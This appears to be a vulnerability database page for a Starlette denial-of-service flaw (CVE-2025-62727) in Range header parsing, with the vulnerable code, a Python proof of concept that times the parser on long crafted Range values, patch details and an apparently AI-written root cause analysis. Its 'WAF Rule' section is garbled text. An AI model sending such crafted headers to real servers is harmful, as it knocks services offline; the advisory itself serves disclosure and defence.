7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-62727

GHSA ID

GHSA-7f5h-v6xp-fcq8

EPSS Score

CWE

CWE-400

Published

10/28/2025

Updated

10/28/2025

KEV Status

Technology

Python

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-62727

CVE-2025-62727: Starlette vulnerable to O(n^2) DoS via Range header merging in ``starlette.responses.FileResponse``

Summary

An unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial‑of‑service for endpoints serving files (e.g., StaticFiles or any use of FileResponse).

Details

Starlette parses multi-range requests in FileResponse._parse_range_header(), then merges ranges using an O(n^2) algorithm.

# starlette/responses.py
_RANGE_PATTERN = re.compile(r"(\d*)-(\d*)") # vulnerable to O(n^2) complexity ReDoS

class FileResponse(Response):
    @staticmethod
    def _parse_range_header(http_range: str, file_size: int) -> list[tuple[int, int]]:
        ranges: list[tuple[int, int]] = []
        try:
            units, range_ = http_range.split("=", 1)
        except ValueError:
            raise MalformedRangeHeader()

        # [...]

        ranges = [
            (
                int(_[0]) if _[0] else file_size - int(_[1]),
                int(_[1]) + 1 if _[0] and _[1] and int(_[1]) < file_size else file_size,
            )
            for _ in _RANGE_PATTERN.findall(range_) # vulnerable
            if _ != ("", "")
        ]

The parsing loop of FileResponse._parse_range_header() uses the regular expression which vulnerable to denial of service for its O(n^2) complexity. A crafted Range header can maximize its complexity.

The merge loop processes each input range by scanning the entire result list, yielding quadratic behavior with many disjoint ranges. A crafted Range header with many small, non-overlapping ranges (or specially shaped numeric substrings) maximizes comparisons.

This affects any Starlette application that uses:

starlette.staticfiles.StaticFiles (internally returns FileResponse) — starlette/staticfiles.py:178
Direct starlette.responses.FileResponse responses

PoC

#!/usr/bin/env python3

import sys
import time

try:
    import starlette
    from starlette.responses import FileResponse
except Exception as e:
    print(f"[ERROR] Failed to import starlette: {e}")
    sys.exit(1)


def build_payload(length: int) -> str:
    """Build the Range header value body: '0' * num_zeros + '0-'"""
    return ("0" * length) + "a-"


def test(header: str, file_size: int) -> float:
    start = time.perf_counter()
    try:
        FileResponse._parse_range_header(header, file_size)
    except Exception:
        pass
    end = time.perf_counter()
    elapsed = end - start
    return elapsed


def run_once(num_zeros: int) -> None:
    range_body = build_payload(num_zeros)
    header = "bytes=" + range_body
    # Use a sufficiently large file_size so upper bounds default to file size
    file_size = max(len(range_body) + 10, 1_000_000)
    
    print(f"[DEBUG] range_body length: {len(range_body)} bytes")
    elapsed_time = test(header, file_size)
    print(f"[DEBUG] elapsed time: {elapsed_time:.6f} seconds\n")


if __name__ == "__main__":
    print(f"[INFO] Starlette Version: {starlette.__version__}")
    for n in [5000, 10000, 20000, 40000]:
        run_once(n)

"""
$ python3 poc_dos_range.py
[INFO] Starlette Version: 0.48.0
[DEBUG] range_body length: 5002 bytes
[DEBUG] elapsed time: 0.053932 seconds

[DEBUG] range_body length: 10002 bytes
[DEBUG] elapsed time: 0.209770 seconds

[DEBUG] range_body length: 20002 bytes
[DEBUG] elapsed time: 0.885296 seconds

[DEBUG] range_body length: 40002 bytes
[DEBUG] elapsed time: 3.238832 seconds
"""

Impact

Any Starlette app serving files via FileResponse or StaticFiles; frameworks built on Starlette (e.g., FastAPI) are indirectly impacted when using file-serving endpoints. Unauthenticated remote attackers can exploit this via a single HTTP request with a crafted Range header.

(GitHub Advisory)

7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-62727

GHSA ID

GHSA-7f5h-v6xp-fcq8

EPSS Score

CWE

CWE-400

Published

10/28/2025

Updated

10/28/2025

KEV Status

Technology

Python

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
starlette	pip	<= 0.49.0	0.49.1

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability exists in the starlette.responses.FileResponse class, specifically within the _parse_range_header static method. The root cause is the use of a regular expression with catastrophic backtracking (re.compile(r"(\\d*)-(\\d*)")) to parse the Range HTTP header. An attacker can send a request with a crafted Range header containing a large number of specially formed substrings, which triggers a quadratic-time complexity in the regex engine, leading to excessive CPU consumption and a denial-of-service. The provided patch confirms this by removing the re.compile and the associated list comprehension that used _RANGE_PATTERN.findall(). It replaces this vulnerable logic with a new _parse_ranges method that manually and safely parses the header by splitting the string, thus avoiding the ReDoS vulnerability. Any application endpoint that serves files using starlette.responses.FileResponse or starlette.staticfiles.StaticFiles (which uses FileResponse internally) is affected.

Vulnerable functions

FileResponse._parse_range_header

starlette/responses.py

The function `_parse_range_header` in the `FileResponse` class is vulnerable to a regular expression denial-of-service (ReDoS) attack. It uses a regex `_RANGE_PATTERN = re.compile(r"(\\d*)-(\\d*)")` to parse the `Range` HTTP header. This regex has a quadratic time complexity, meaning a specially crafted `Range` header with a large number of non-overlapping ranges can cause the server's CPU to spike, leading to denial of service. The patch removes the regex-based parsing and replaces it with a safer, manual parsing implementation in a new `_parse_ranges` method.

WAF Protection Rules

WAF Rule

### Summ*ry *n un*ut**nti**t** *tt**k*r **n s*n* * *r**t** *TTP R*n** *****r t**t tri***rs qu**r*ti*-tim* pro**ssin* in St*rl*tt*'s `*il*R*spons*` R*n** p*rsin*/m*r*in* lo*i*. T*is *n**l*s *PU *x**ustion p*r r*qu*st, **usin* **ni*l‑o*‑s*rvi** *or *n*

Reasoning

T** vuln*r**ility *xists in t** `st*rl*tt*.r*spons*s.*il*R*spons*` *l*ss, sp**i*i**lly wit*in t** `_p*rs*_r*n**_*****r` st*ti* m*t*o*. T** root **us* is t** us* o* * r**ul*r *xpr*ssion wit* **t*strop*i* ***ktr**kin* (`r*.*ompil*(r"(\\**)-(\\**)")`) t

7.5

Basic Information

Concerned about an active attack path?

CVE-2025-62727: Starlette vulnerable to O(n^2) DoS via Range header merging in ``starlette.responses.FileResponse``

Summary

Details

PoC

Impact

7.5

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI